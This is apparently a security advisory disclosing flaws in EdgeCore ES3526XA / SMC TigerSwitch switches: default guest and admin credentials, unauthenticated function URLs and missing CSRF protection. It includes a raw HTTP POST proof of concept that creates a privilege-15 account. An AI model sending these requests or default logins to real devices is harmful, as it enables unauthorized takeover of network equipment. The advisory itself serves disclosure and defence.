EdgeCore ES3526XA Manager CSRF / Access Bypass / Weak Credentials

`*EdgeCore - Layer2+ Fast Ethernet Standalone Switch ES3526XA Manager -  
Multiple Vulnerabilities*  
Also rebranded as: *SMC TigerSwitch 10/100 SMC6128L2 Manager*  
  
Object ID:  
1.3.6.1.4.1.259.8.1.5  
  
Switch Information  
________________________________________  
Main Board:  
Number of Ports 26  
Hardware Version R01  
Management Software:  
Loader Version 1.0.0.2  
Boot-ROM Version 1.0.0.5  
Operation Code Version 1.28.16.14  
  
Object ID:  
1.3.6.1.4.1.202.20.66  
  
Switch Information  
________________________________________  
Main Board:  
Number of Ports 28  
Hardware Version R01  
Chip Device ID Marvell 98DX106-B0, 88E6095[F]  
Internal Power Status Active  
  
Management Software:  
EPLD Version 0.07  
Loader Version 1.0.2.0  
Boot-ROM Version 1.2.0.1  
Operation Code Version 1.4.18.2  
Role Master  
  
Other firmware / software versions may also be affected.  
  
*Vendor Response*: These models are no longer supported.  
  
*Vulnerability Details*  
  
*1. Weak Credentials Management *  
  
Guest / guest – priv 0 - read privileges to most device configuration  
Admin/admin – priv 15 - read/write access  
  
*Issue:*  
Mandatory password change not enforced by the application.  
  
*2. Access Control Flaws*  
  
Any functions can be performed by directly calling the function URL  
(GET/POST) without any authentication. This includes creating new  
privileged user(s), changing (admin) passwords, deleting user(s),  
reading/changing device configuration, rebooting device etc.  
  
+ Guest can also perform any administrative functions such as  
add,update,delete users  
  
*PoC 1:*  
For example, anyone can access these urls directly, without any  
authentication:  
  
http://IP/config/153/sysinfo.htm?unit=1  
http://IP/config/153/port_config.htm?unit=  
http://IP/home/153/active_panel_bid0.htm?unit=1  
http://IP/config/upnp_config.htm  
http://IP/config/153/user_accounts.htm  
  
*PoC 2:*  
Create a new privileged account:  
  
POST /config/153/user_accounts.htm HTTP/1.1  
Host: IP  
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36  
(KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
DNT: 1  
Referer: http://IP/config/153/user_accounts.htm  
Cookie: expires=Fri, 1 Jan 2016 01:33:07 GMT  
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 166  
  
page=userAccount&actionType=Add&sel_account=guest&txt_user_name=guest1&sel_access_level=15&pswd=guest1&pswd_confirm=guest1&txt_user_name2=&passwd_new=&passwd_confirm=  
  
*Issue:*  
Application does not enforce access control correctly.  
  
*3. Vulnerable to Cross-Site Request Forgery *  
  
There is no CSRF Token generated per page and / or per (sensitive)  
function. Successful exploitation of this vulnerability can allow silent  
execution of unauthorized actions on the device such as password change,  
configuration parameter changes, saving modified configuration, & device  
reboot.  
  
+++++  
  
  
`